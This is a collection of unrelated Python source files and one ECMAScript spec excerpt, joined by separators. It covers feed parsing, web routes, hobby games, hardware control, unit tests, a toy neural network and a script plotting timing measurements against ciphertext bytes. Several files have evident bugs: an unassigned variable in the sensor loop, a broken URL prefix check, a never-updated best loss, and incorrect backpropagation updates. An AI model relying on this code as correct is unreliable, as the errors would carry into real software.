except (parsers.NotAJSONFeedError, json.decoder.JSONDecodeError) as e:
pass
channel, defaultns = parsers.get_rss_feed_parts(cached_content, overtime=overtime)
return RssFeedPage(channel, url=url, defaultns=defaultns)
class RssFeedPage(object):
def __init__(self, tree, url='', defaultns=''):
self.tree = tree
self.defaultns = defaultns
self.url = url
@property
def title(self):
title_elem = self.tree.find('{}title'.format(self.defaultns))
return title_elem.text if title_elem is not None else None
@property
def description(self):
description_elem = self.tree.find('{}description'.format(self.defaultns))
return description_elem.text if description_elem is not None else None
@property
def link(self):
link_elems = self.tree.findall('{}link'.format(self.defaultns))
for link_elem in link_elems:
if link_elem.attrib.get('rel') == 'self':
continue
link = link_elem.text or link_elem.attrib.get('href')
if self.url and link:
link = parse.urljoin(self.url, link)
return link
@property
def categories(self):
return {
c.text for c in itertools.chain(*(
i.findall('{}category'.format(self.defaultns))
for i in self.tree.findall('{}item'.format(self.defaultns)) + [self.tree]
)) if c is not None and c.text
}
@property
def image(self):
image_elems = self.tree.findall('{}image/url'.format(self.defaultns))
for image_elem in image_elems:
if image_elem.attrib.get('rel') == 'self':
continue
image = image_elem.text or image_elem.attrib.get('href')
return image
@property
def cloud(self):
cloud_elems = self.tree.findall('{}cloud'.format(self.defaultns))
for cloud_elem in cloud_elems:
if cloud_elem.attrib.get('rel') == 'self':
continue
cloud = cloud_elem.text or cloud_elem.attrib.get('href')
return cloud
class JSONFeedPage(object):
def __init__(self, feed, url=''):
self.feed = feed
self.url = url
@property
def title(self):
return self.feed.get('title', None)
@property
def description(self):
return self.feed.get('description', None)
@property
def link(self):
return self.feed.get('home_page_url', None)
@property
def image(self):
author = self.feed.get('author', None)
if author:
image = author.get('avatar', None)
else:
image = self.feed.get('icon', None)
if not image:
image = self.feed.get('favicon', None)
return image
class SitePage(object):
def __init__(self, soup, url=''):
self.soup = soup
self.url = url
@property
def possible_feeds(self):
for feed_elem in self.soup.find_all(rel='alternate'):
# Check for relative links.
if feed_elem['href'][:3] == 'http':
yield feed_elem['href']
else:
yield parse.urljoin(self.url, feed_elem['href'])
|
import numpy as np
import matplotlib.pyplot as plt
## [byte]
time_result = [0] * 256;
number_count = [0] * 256;
lines = []
count = 0
with open('result_0xff.txt') as f:
lines = f.readlines()
for line in lines:
s = line.split()
time_result[int(s[0][0:2],16)] += int(s[1])
number_count[int(s[0][0:2],16)] += 1
final_result = [0] * 256
cc = 0
for (c,s) in zip(number_count, time_result):
final_result[cc] = s/c
if (final_result[cc] > 5440):
print(cc, final_result[cc])
cc += 1
x1 = [0] * 256
for i in range(0,256):
x1[i] = i
x = np.arange(0,256)
plt.plot(x1,final_result)
plt.ylabel("Timing Measurement(cycles)")
plt.xlabel("The first byte of ciphertexts")
plt.savefig("graph_0xff.pdf")
#print(count)
#for line in
#s = f.readline().split()
#print(s[0], s[1])
|
1. Let _to_ be ? ToObject(_target_).
1. If only one argument was passed, return _to_.
1. Let _sources_ be the List of argument values starting with the second argument.
1. For each element _nextSource_ of _sources_, in ascending index order, do
1. If _nextSource_ is neither *undefined* nor *null*, then
1. Let _from_ be ! ToObject(_nextSource_).
1. Let _keys_ be ? _from_.[[OwnPropertyKeys]]().
1. For each element _nextKey_ of _keys_ in List order, do
1. Let _desc_ be ? _from_.[[GetOwnProperty]](_nextKey_).
1. If _desc_ is not *undefined* and _desc_.[[Enumerable]] is *true*, then
1. Let _propValue_ be ? Get(_from_, _nextKey_).
1. Perform ? Set(_to_, _nextKey_, _propValue_, *true*).
1. Return _to_. |
from datetime import date
from starlette.templating import Jinja2Templates
from backend.schemas.issues import Label, Severity, Status
templates = Jinja2Templates(directory="frontend/components")
templates.env.globals = {
**templates.env.globals,
"severity": Severity,
"status": Status,
"label": Label,
"current_year": date.today().year,
"current_date": date.today(),
}
|
from .auth import SignupApi, InitialLoginApi, PassLoginApi, GetUserNotifIdApi, GetUsersNotifIdsApi, GetAllUsersApi
from .portfolio import GetAllPortfoliosApi, GetPortfoliosApi, AddPortfolioItemApi, SetPortfolioBuyTarget, SetPortfolioSellTarget, PortfolioDeleteApi, GetSinglePortfolioApi
from .change import GetChangesApi, AddChangeItemApi
from .ticker import GetTickersApi, GetAllTickerDetailsApi, GetAllCurrencyDetailsApi, GetSingleTickerApi, GetSingleTickerDetailsApi, AddTickerItemApi, AddTickerScrapDataApi, TickerSearchApi
from .transaction import GetAllTransactionsApi, GetTransactionsApi, GetMixedTransactionsApi, AddTransactionItemApi, DeleteTransactionItemApi, SetInformTransactionItemApi, SellTransactionItemApi, GetTracingTransactionsApi, SetCurrentPriceTransactionItemApi, SetTracedTransactionItemApi
from .notifications import GetNotificationsApi, AddNotificationItemApi, NotificationViewedApi, DeleteNotificationApi
from .simulation import SimulationResultApi, AddSimulationApi, SimulationSaveApi
def initialize_routes(api):
api.add_resource(SignupApi, '/api/auth/signup')
api.add_resource(InitialLoginApi, '/api/auth/login')
api.add_resource(PassLoginApi, '/api/auth/login/<code>')
api.add_resource(GetUserNotifIdApi, '/api/auth/user-notifid')
api.add_resource(GetUsersNotifIdsApi, '/api/auth/notif-ids')
api.add_resource(GetAllUsersApi, '/api/auth/users')
api.add_resource(GetAllPortfoliosApi, '/api/portfolio/all')
api.add_resource(GetPortfoliosApi, '/api/portfolio')
api.add_resource(GetSinglePortfolioApi, '/api/portfolio/single')
api.add_resource(AddPortfolioItemApi, '/api/portfolio/add')
api.add_resource(SetPortfolioBuyTarget, '/api/portfolio/setbuytarget')
api.add_resource(SetPortfolioSellTarget, '/api/portfolio/setselltarget')
api.add_resource(PortfolioDeleteApi, '/api/portfolio/delete')
api.add_resource(GetChangesApi, '/api/change')
api.add_resource(AddChangeItemApi, '/api/change/add')
api.add_resource(GetTickersApi, '/api/ticker')
api.add_resource(GetAllTickerDetailsApi, '/api/ticker/all')
api.add_resource(GetAllCurrencyDetailsApi, '/api/ticker/currencies')
api.add_resource(GetSingleTickerApi, '/api/ticker/single')
api.add_resource(GetSingleTickerDetailsApi, '/api/ticker/single-details')
api.add_resource(AddTickerItemApi, '/api/ticker/add')
api.add_resource(AddTickerScrapDataApi, '/api/ticker/scrap')
api.add_resource(TickerSearchApi, '/api/ticker/search')
api.add_resource(GetAllTransactionsApi, '/api/transaction/all')
api.add_resource(GetTransactionsApi, '/api/transaction')
api.add_resource(GetMixedTransactionsApi, '/api/transaction/mixed')
api.add_resource(AddTransactionItemApi, '/api/transaction/add')
api.add_resource(DeleteTransactionItemApi, '/api/transaction/delete')
api.add_resource(SetInformTransactionItemApi, '/api/transaction/inform')
api.add_resource(SellTransactionItemApi, '/api/transaction/sell')
api.add_resource(GetTracingTransactionsApi, '/api/transaction/tracing')
api.add_resource(SetCurrentPriceTransactionItemApi,
'/api/transaction/set-current-price')
api.add_resource(SetTracedTransactionItemApi,
'/api/transaction/set-traced')
api.add_resource(GetNotificationsApi, '/api/notification')
api.add_resource(AddNotificationItemApi, '/api/notification/add')
api.add_resource(NotificationViewedApi, '/api/notification/viewed')
api.add_resource(DeleteNotificationApi, '/api/notification/delete')
api.add_resource(SimulationResultApi, '/api/simulation')
api.add_resource(AddSimulationApi, '/api/simulation/add')
api.add_resource(SimulationSaveApi, '/api/simulation/save')
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
"""
日本語Kivy解説書でHello World的な
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Rectangle
class Field(Widget):
def __init__(self):
super(Field, self).__init__()
self.canvas.add(Rectangle(source='background.jpg', size=(1024,768)))
bird = Bird()
self.add_widget(bird)
class Bird(Widget):
def __init__(self):
super(Bird, self).__init__()
self.canvas.add(Rectangle(source='unko.png',
size=(100,200), pos=(100,100)))
class MyApp(App):
def build(self):
return Field()
if __name__ == '__main__':
MyApp().run()
|
from math import comb
from helpers import analytics
analytics.monitor()
def main():
result = 0
for n in range(1,101):
for r in range(n+1):
if comb(n,r) > 1000000:
result += 1
return result
print(main(), analytics.lap(), analytics.maxMem()) |
# ******************************************
# © 2019 Amar Lokman Some Rights Reserved
# ******************************************
# ---------------------------------------------------------
# ADD MODULES
# ---------------------------------------------------------
import time
import Adafruit_MCP3008
import datetime
import RPi.GPIO as GPIO
# ---------------------------------------------------------
# GPIO CONFIGURATION
# ---------------------------------------------------------
# Set BCM Pin for this Pi
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO_RELAY = 20
GPIO_LED = 16
GPIO.setup(GPIO_LED, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(GPIO_RELAY,GPIO.OUT, initial=GPIO.HIGH)
CLK = 11
MISO = 9
MOSI = 10
CS = 8
mcp = Adafruit_MCP3008.MCP3008(clk=CLK, cs=CS, miso=MISO, mosi=MOSI)
# ---------------------------------------------------------
# CONSTANT CONFIGURATION
# ---------------------------------------------------------
count1 = 0
count2 = 0
minHeight = 40
maxHeight = 250
# ---------------------------------------------------------
# SHARP Infrared Sensor 100cm to 550cm CONFIGURATION
# ---------------------------------------------------------
def distance():
runningTotal = 0
avgFactor = 75
for x in range(avgFactor):
v = mcp.read_adc(0)
distance = 28250 / (v-229.5)
runningTotal = runningTotal + distance
else:
distance = (runningTotal / avgFactor)
return distance
# ---------------------------------------------------------
# MAIN FUNCTION
# ---------------------------------------------------------
if __name__ == '__main__':
try:
while True:
print("Distance {:.2f}".format(dist))
time.sleep(2)
print ("****************************************************")
if (count1 == 0) :
if ( dist > minHeight and dist < maxHeight):
# Enter Condition
# Switch ON bulb and LED
GPIO.output (GPIO_RELAY,GPIO.LOW)
GPIO.output(GPIO_LED, GPIO.HIGH)
count1 += 1
count2 = 0
print ("---------- State 1 ------------")
time.sleep(2)
else:
if ( dist > minHeight and dist < maxHeight):
GPIO.output (GPIO_RELAY,GPIO.LOW)
GPIO.output(GPIO_LED, GPIO.HIGH)
count1 += 1
print ("---------- State 2 ------------")
time.sleep(2)
else:
if (count2 == 0) :
# Enter Condition
# Switch OFF bulb and LED
GPIO.output (GPIO_RELAY,GPIO.HIGH)
GPIO.output(GPIO_LED, GPIO.LOW)
count2 += 1
print ("---------- State 3 ------------")
time.sleep(1)
else:
GPIO.output (GPIO_RELAY,GPIO.HIGH)
GPIO.output(GPIO_LED, GPIO.LOW)
count1 = 0
print ("---------- State 4 ------------")
time.sleep(1)
except KeyboardInterrupt:
print("Ending Script Coding")
|
import threading
from fsync.master import Master
from fsync.slave import Slave
from fsync import common
import asyncio
import os
import shutil
import time
import logging
def run_thread(runnable: common.Runnable):
def run():
asyncio.run(runnable.run())
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
return thread
def test_slave_master():
slave_dir = "tmp/slave_dir"
os.makedirs(slave_dir, exist_ok=True)
try:
cfg = common.MappingConfig(master_dir="data/", slave_dir=slave_dir)
master = Master(slave_addr=("127.0.0.1", 31415),
ssl_context=None,
mapping_config=cfg)
slave = Slave(listen_addr=("127.0.0.1", 31415),
ssl_context=None)
process_slave = run_thread(slave)
time.sleep(0.5)
process_master = run_thread(master)
time.sleep(10)
return
finally:
pass
# shutil.rmtree("tmp")
|
import pygame
from pygame.locals import *
from Puntos import *
class Jugador():
def __init__(self):
super(Jugador, self).__init__()
def mover(self, move, numColum, tablero):
if(move[0] + 1 == move[1] - 1):
tablero[move[0] + 1] = "-"
elif(move[0] + numColum == move[1] - numColum):
tablero[move[0] + numColum] = "|"
else:
return "Error"
def conectar(self, pantalla, x1, y1, x2, y2):
pygame.draw.line(pantalla, (0, 0, 0),
(x1, y1), (x2, y2), 10)
def realizarMov(self, encola, tablero, pantalla, numCol):
#print(encola[0].valor, encola[1].valor)
if(encola[0].valor > encola[1].valor):
if(encola[0].valor - 1 == encola[1].valor + 1):
if(tablero[encola[0].valor - 1] != "-"):
self.conectar(pantalla, encola[0].x, encola[0].y,
encola[1].x, encola[1].y)
#self.mover([encola[1].x, encola[1].y], numCol)
tablero[encola[0].valor - 1] = "-"
return "Agente"
elif(encola[0].valor - numCol == encola[1].valor + numCol):
if(tablero[encola[0].valor - numCol] != "|"):
self.conectar(pantalla, encola[0].x, encola[0].y,
encola[1].x, encola[1].y)
tablero[encola[0].valor - numCol] = "|"
return "Agente"
elif(encola[0].valor < encola[1].valor):
if(encola[0].valor + 1 == encola[1].valor - 1):
if(tablero[encola[0].valor + 1] != "-"):
self.conectar(pantalla, encola[0].x, encola[0].y,
encola[1].x, encola[1].y)
tablero[encola[0].valor + 1] = "-"
return "Agente"
elif(encola[0].valor + numCol == encola[1].valor - numCol):
if(tablero[encola[0].valor + numCol] != "|"):
self.conectar(pantalla, encola[0].x, encola[0].y,
encola[1].x, encola[1].y)
tablero[encola[0].valor + numCol] = "|"
return "Agente"
def haylazo(self, puntos, numlazos):
nlazoJ = numlazos
if puntos >= 30:
#nlazoJ = numlazos
numlazos += 1
return nlazoJ, numlazos # [N° lazos anterior, N° lazos actual] |
from typing import Dict, List, Tuple
import numpy as np
from torch.utils.data.dataloader import DataLoader
from message_passing_nn.data.data_preprocessor import DataPreprocessor
from message_passing_nn.infrastructure.graph_dataset import GraphDataset
from message_passing_nn.model.trainer import Trainer
from message_passing_nn.utils.logger import get_logger
from message_passing_nn.utils.saver import Saver
class GridSearch:
def __init__(self,
dataset: GraphDataset,
data_preprocessor: DataPreprocessor,
trainer: Trainer,
grid_search_configurations: List[Tuple[Tuple]],
saver: Saver) -> None:
self.dataset = dataset
self.data_preprocessor = data_preprocessor
self.trainer = trainer
self.grid_search_configurations = grid_search_configurations
self.saver = saver
self.results = {'training_loss': {},
'validation_loss': {},
'test_loss': {}}
def start(self) -> Dict:
get_logger().info('Starting Grid Search')
configuration_id = ''
for configuration in self.grid_search_configurations:
configuration_dictionary, dataloaders = self._build_a_configuration(configuration)
self._train_a_single_configuration(configuration_dictionary['configuration_id'],
dataloaders,
configuration_dictionary['epochs'],
configuration_dictionary['validation_period'])
self.saver.save_results(self.results, configuration_id)
get_logger().info('Finished Training')
return self.results
def _train_a_single_configuration(self,
configuration_id: str,
dataloaders: Tuple[DataLoader, DataLoader, DataLoader],
epochs: int,
validation_period: int) -> None:
get_logger().info('Starting training:'.format(configuration_id))
training_data, validation_data, test_data = dataloaders
validation_loss_max = np.inf
for epoch in range(1, epochs + 1):
training_loss = self.trainer.do_train_step(training_data, epoch)
self.results['training_loss'][configuration_id].update({epoch: training_loss})
if epoch % validation_period == 0:
validation_loss = self.trainer.do_evaluate_step(validation_data, epoch)
self._save_best_model(configuration_id, epoch, validation_loss, validation_loss_max)
self.results['validation_loss'][configuration_id].update({epoch: validation_loss})
test_loss = self.trainer.do_evaluate_step(test_data)
self.results['test_loss'][configuration_id].update({'final_epoch': test_loss})
get_logger().info('Finished training:'.format(configuration_id))
def _save_best_model(self, configuration_id, epoch, validation_loss, validation_loss_max):
if validation_loss < validation_loss_max:
self.saver.save_model(epoch, configuration_id, self.trainer.model)
def _build_a_configuration(self, configuration: Tuple[Tuple]) \
-> Tuple[dict, Tuple[DataLoader, DataLoader, DataLoader]]:
configuration_dictionary = self._get_configuration_dictionary(configuration)
dataloaders, data_dimensions = self._prepare_dataset(configuration_dictionary)
self.trainer.build(data_dimensions, configuration_dictionary)
self._update_results_dict_with_configuration_id(configuration_dictionary)
return configuration_dictionary, dataloaders
@staticmethod
def _get_configuration_dictionary(configuration: Tuple[Tuple]) -> dict:
configuration_dictionary = dict(((key, value) for key, value in configuration))
configuration_id = 'configuration&id'
for key, value in configuration_dictionary.items():
configuration_id += '__' + '&'.join([key, str(value)])
configuration_dictionary.update({'configuration_id': configuration_id})
return configuration_dictionary
def _prepare_dataset(self, configuration_dictionary: Dict) \
-> Tuple[Tuple[DataLoader, DataLoader, DataLoader], dict]:
dataloaders = self.data_preprocessor.train_validation_test_split(self.dataset,
configuration_dictionary['batch_size'],
configuration_dictionary['validation_split'],
configuration_dictionary['test_split'])
data_dimensions = self.data_preprocessor.extract_data_dimensions(self.dataset)
return dataloaders, data_dimensions
def _update_results_dict_with_configuration_id(self, configuration_dictionary: Dict) -> None:
for key in self.results:
self.results[key].update({configuration_dictionary['configuration_id']: {}})
|
########################################################################
# test_req_task_imhistory.py
#
# Copyright (C) 2018
# Associated Universities, Inc. Washington DC, USA
#
# This script is free software; you can redistribute it and/or modify it
# under the terms of the GNU Library General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public
# License for more details.
#
# [Add the link to the JIRA ticket here once it exists]
#
# Based on the requirements listed in plone found here:
# https://casa.nrao.edu/casadocs-devel/stable/global-task-list/task_imhistory/about
#
#
##########################################################################
CASA6 = False
try:
import casatools
from casatasks import imhistory, casalog
import sys
import os
myia = casatools.image()
tb = casatools.table()
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
CASA6 = True
except ImportError:
import sys
import os
from __main__ import default
from tasks import *
from taskinit import *
myia = iatool()
import unittest
import shutil
if CASA6:
casaimagepath = casatools.ctsys.resolve('image/ngc5921.clean.image')
fitspath = casatools.ctsys.resolve('fits/1904-66_AIR.fits')
#miriadpath = casatools.ctsys.resolve('visibilities/other/compact.vis')
else:
if os.path.exists(os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req'):
casaimagepath = os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req/image/ngc5921.clean.image'
fitspath = os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req/fits/1904-66_AIR.fits'
else:
casaimagepath = os.environ.get('CASAPATH').split()[0] + '/casa-data-req/image/ngc5921.clean.image'
fitspath = os.environ.get('CASAPATH').split()[0] + '/casa-data-req/fits/1904-66_AIR.fits'
def change_perms(path):
os.chmod(path, 0o777)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chmod(os.path.join(root,d), 0o777)
for f in files:
os.chmod(os.path.join(root,f), 0o777)
logpath = casalog.logfile()
imagecopy = 'imagecopy.image'
class imhistory_test(unittest.TestCase):
@classmethod
def setUpClass(cls):
shutil.copytree(casaimagepath, imagecopy)
change_perms(imagecopy)
def setUp(self):
if not CASA6:
default(imhistory)
def tearDown(self):
myia.done()
tb.done()
casalog.setlogfile(logpath)
if os.path.exists('testlog.log'):
os.remove('testlog.log')
if os.path.exists('basic'):
shutil.rmtree('basic')
@classmethod
def tearDownClass(cls):
shutil.rmtree(imagecopy)
def test_takesCASAImage(self):
''' 1. test_takesCASAImage: Check that imhistory takes a CASA image file (*.image)'''
messages = imhistory(imagecopy, mode='list', verbose=False)
self.assertTrue(messages)
def test_takesFITS(self):
''' 2. test_takesFITS: Check that imhistory takes a FITS file '''
messages = imhistory(fitspath, mode='list', verbose=False)
self.assertTrue(messages)
def test_listModeVerbose(self):
''' 3. test_listModeVerbose: Check that the list mode with verbose on outputs to log file and outputs an array of strings '''
casalog.setlogfile('testlog.log')
historyMessages = imhistory(imagecopy, mode='list', verbose=True)
self.assertTrue(len(historyMessages) > 0 and 'HISTORY' in open('testlog.log').read())
def test_listModeNoVerbose(self):
''' 4. test_listModeNoVerbose: Check that the list mode with verbose off outputs an array of strings and does not output to the log file '''
casalog.setlogfile('testlog.log')
historyMessages = imhistory(imagecopy, mode='list', verbose=False)
if CASA6:
self.assertFalse(os.path.getsize("testlog.log") > 41336)
else:
self.assertFalse('HISTORY' in open('testlog.log').read())
def test_appendModeNoDefaults(self):
'''5. test_appendModeNoDefaults: Check that the append mode adds a string to the image history without use of default settings for message or origin '''
casalog.setlogfile('testlog.log')
success = imhistory(imagecopy, mode='append', message='TESTMESSAGEtest5', origin='TESTORIGINtest5')
# Run imhistory again to output the history messages to the log to check if the message was added
imhistory(imagecopy, mode='list', verbose=True)
self.assertTrue('TESTMESSAGEtest5' in open('testlog.log').read() and 'TESTORIGINtest5' in open('testlog.log').read())
def test_appendModeDefaultOrigin(self):
''' 6. test_appendModeDefaultOrigin: Check that append mode adds a string to the image history with the default origin setting '''
casalog.setlogfile('testlog.log')
#default(imhistory)
success = imhistory(imagecopy, mode='append', message='TESTMESSAGEtest6')
# Run imhistory again to output the history messages to the log to check if the message was added.
if not CASA6:
default(imhistory)
imhistory(imagecopy, mode='list', verbose=True)
self.assertTrue('imhistory' in open('testlog.log').read() and 'TESTMESSAGEtest6' in open('testlog.log').read())
def test_correctReturnedParameters(self):
''' 7. test_correctReturnedParameters: Check that imhistory returns the expected parameters by looking for FILLM and BPASS '''
casalog.setlogfile('testlog.log')
historyMessages = imhistory(imagecopy, mode='list')
self.assertTrue(('FILLM' in s for s in historyMessages) and ('BPASS' in n for n in historyMessages))
def test_noExistingMode(self):
''' 8. test_noExistingMode: Check that an exception is raised when a non-valid mode is given '''
if CASA6:
with self.assertRaises(Exception):
imhistory(imagecopy, mode='fakeMode')
else:
casalog.setlogfile('testlog.log')
imhistory(imagecopy, mode='fakemode')
self.assertTrue('SEVERE' in open('testlog.log').read())
# merged imhistory tests start here
# ---------------------------------------------
def test_imhistory(self):
"""Test general functionality"""
shape = [2,3,4]
imagename = "basic"
myia.fromshape(imagename, shape)
myia.done()
h = imhistory(imagename, mode="list")
self.assertTrue(len(h) == 3, "Incorrect history length")
for hh in h[1:2]:
print(hh)
self.assertTrue("fromshape" in hh, "Incorrect message")
msg = "fred"
self.assertTrue(
imhistory(imagename, mode="append", message=msg),
"Error appending message"
)
h = imhistory(imagename, mode="list")
self.assertTrue(len(h) == 4, "Incorrect history length")
for hh in h[1:2]:
self.assertTrue("fromshape" in hh, "Incorrect message")
self.assertTrue(msg in h[3], "Incorrect appended message")
def suite():
return[imhistory_test]
# Main #
if __name__ == '__main__':
unittest.main()
|
#โปรแกรมหยิบสินค้าใส่ตระกร้า
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("โปรดหยิบสินค้าใส่ตระกร้า")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++")
a = input("หยิบสินค้าครั้งที่ 1 :")
b = input("หยิบสินค้าครั้งที่ 2 :")
c = input("หยิบสินค้าครั้งที่ 3 :")
d = input("หยิบสินค้าครั้งที่ 4 :")
e = input("หยิบสินค้าครั้งที่ 5 :")
basket = []
basket.append(a)
basket.append(b)
basket.append(c)
basket.append(d)
basket.append(e)
print('1.',basket[0])
print('2.',basket[1])
print('3.',basket[2])
print('4.',basket[3])
print('5.',basket[4]) |
def Main(operation):
if operation == 1:
return operation + 1
elif operation == 2:
return operation + 1
elif operation == 3:
return operation + 1
elif operation == 4:
return operation + 1
elif operation == 5:
return operation + 1
elif operation == 6:
return operation + 1
elif operation == 7:
return operation + 1
elif operation == 8:
return operation + 1
elif operation == 9:
return operation + 1
elif operation == 10:
return operation + 1
elif operation == 11:
return operation + 1
elif operation == 12:
return operation + 1
elif operation == 13:
return operation + 1
elif operation == 14:
return operation + 1
elif operation == 15:
return operation + 1
elif operation == 16:
return operation + 1
elif operation == 17:
return operation + 1
elif operation == 18:
return operation + 1
return -1
|
from node import node
class network():
#Constructor for the network
def __init__(self, arch, start_weights):
self.neurons = [] # Two dimensional array to hold all the neurons
self.eta = 0.01 #Standard learning rate
self.dimensions = arch # What the dimensions of each layer will be
nextLayer = 1 # Easy access to next layer
for i in range(len(self.dimensions)): # For the number of layers
nodeArray = [] # Create new row
for j in range(self.dimensions[i]): #Each node in that layer
nodeWeights = [] #Weights for the node
count = 0 #Keep track of which weight we are on
if i < len(self.dimensions)-1: #Only do this if it isn't the output layer
for k in range(self.dimensions[nextLayer]):
nodeWeights.append(start_weights[j + (self.dimensions[i] * count)]) #Grab the right weights for the node
count += 1
newNode = node() #Create new node and give it its weights
newNode.set_weights(nodeWeights) #Set the weights of the node
nodeArray.append(newNode) #Add it to the array for this layer
nextLayer += 1
self.neurons.append(nodeArray) #Add the row to the neurons matrix
#Helper function to add ouput times the weights
def calc(self,neuron, weightIndex):
return neuron.output * neuron.weights[weightIndex]
#Feed the input forward through the network
def feedforward(self, xin):
layers = len(self.dimensions)
for i in range(self.dimensions[0]): #Set the output of the input layer to the input
self.neurons[0][i].output = xin[i]
#Calculate the output of each node in the network
for layer in range(1, layers): #For each layer
for node in range(self.dimensions[layer]): #For each node in that layer
#Calculate the sum of output * weight for each neuron in the previous layer
summation = sum([self.calc(neuron,node) for neuron in self.neurons[layer-1]])
self.neurons[layer][node].fire(summation) #Fire that node and save the output for it
fun = lambda x : x.output #Quick function to return the output of a node
results = [ fun(x) for x in self.neurons[-1]] #Make a list of all the outputs of the last layer
return results #Return the results of the output layer
def backprop(self, xin, y):
layers = len(self.dimensions)
results = self.feedforward(xin)
#Set the Error of the output layer
for output_node in range(self.dimensions[-1]):
curr_node = self.neurons[-1][output_node]
#Calculate the error
curr_node.error = self.cost(curr_node.output, y[output_node]) * self.sig_prime(curr_node.zsum)
#Go Backwards and calculate the error for the rest of the layers
#Loop for each layer
for layer in range(layers-2,-1,-1):
#Loop for each node in that layer
for node in range(self.dimensions[layer]):
#Loop for each node in the next layer
for next_node in range(self.dimensions[layer+1]):
self.neurons[layer][node].error = (self.neurons[layer][node].weights[next_node] * self.neurons[layer+1][next_node].error) * \
self.sig_prime(self.neurons[layer][node].zsum) #Calculate the error of the node
#Calculate the error of the weight connecting to the next node
self.neurons[layer][node].weight_error.append(self.neurons[layer][node].output * self.neurons[layer+1][next_node].error)
#Changed the weights in the network based on the weight_error
for layer in range(layers-1):
for node in range(self.dimensions[layer]):
for weight in range(len(self.neurons[layer][node].weights)):
self.neurons[layer][node].weights[weight] = (self.neurons[layer][node].weights[weight] - self.eta) * \
self.neurons[layer][node].weight_error[weight]
trained_weights = [] #Newly trained weights
weight_error = [] #Error of each weight
#Grab weights and weight error
for layer in range(layers-1):
for connection in range(self.dimensions[layer+1]):
for node in range(self.dimensions[layer]):
trained_weights.append(self.neurons[layer][node].weights[connection])
weight_error.append(self.neurons[layer][node].weight_error[connection])
#Grab the output error
output_error = [n.error for a in self.neurons for n in a] #double list comprehension
return (output_error,weight_error,trained_weights)
#Cost function
def cost(self, activation, correct):
return activation * correct
#Quick grab for sigmoid
def sigmoid(self, x):
return x / (1 + abs(x))
#Quick grab for sigmoid derivative
def sig_prime(self, z):
return self.sigmoid(z) * (1-self.sigmoid(z))
|
from pecan import conf
import os
from deuce.tests import FunctionalTest
from deuce.drivers.metadatadriver import MetadataStorageDriver, GapError,\
OverlapError
from deuce.drivers.sqlite import SqliteStorageDriver
from mock import MagicMock
class SqliteStorageDriverTest(FunctionalTest):
def create_driver(self):
return SqliteStorageDriver()
def test_basic_construction(self):
driver = SqliteStorageDriver()
def test_geneology(self):
driver = SqliteStorageDriver()
assert isinstance(driver, MetadataStorageDriver)
assert isinstance(driver, object)
def test_vault_statistics(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
# empty vault stats
# TODO ** Create Vault Here **
statistics = driver.get_vault_statistics(vault_id)
main_keys = ('files', 'blocks')
for key in main_keys:
assert key in statistics.keys()
assert 'count' in statistics[key].keys()
assert statistics[key]['count'] == 0
# TODO: Add files and check that founds match as expected
def test_db_health(self):
driver = self.create_driver()
retval = driver.get_health()
driver.get_health = MagicMock(return_value=str('is not active.'))
retval = driver.get_health()
assert retval == str('is not active.')
def test_file_crud(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
assert not driver.has_file(vault_id, file_id)
# Length of Non-existent file is 0
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
driver.create_file(vault_id, file_id)
assert driver.has_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
data = driver.get_file_data(vault_id, file_id)
driver.delete_file(vault_id, file_id)
assert not driver.has_file(vault_id, file_id)
def test_finalize_empty_file(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
driver.create_file(vault_id, file_id)
assert not driver.is_finalized(vault_id, file_id)
driver.finalize_file(vault_id, file_id)
assert driver.is_finalized(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
def test_finalize_nonexistent_file(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
assert not driver.has_file(vault_id, file_id)
retval = driver.finalize_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
try:
data = driver.get_file_data(vault_id, file_id)
except:
assert True
assert not driver.has_file(vault_id, file_id)
assert not driver.is_finalized(vault_id, file_id)
def test_block_crud(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
block_id = self.create_block_id()
size = 4096
assert not driver.has_block(vault_id, block_id)
try:
size = driver.get_block_data(vault_id, block_id)['blocksize']
except:
assert True
driver.register_block(vault_id, block_id, size)
assert driver.has_block(vault_id, block_id)
self.assertEqual(driver.get_block_data(vault_id,
block_id)['blocksize'], size)
# Call again, shouldn't throw
driver.register_block(vault_id, block_id, size)
driver.unregister_block(vault_id, block_id)
assert not driver.has_block(vault_id, block_id)
assert not driver.has_block(vault_id, 'invalidid')
def test_file_assignment_no_block(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id,
file_id), False)
driver.create_file(vault_id, file_id)
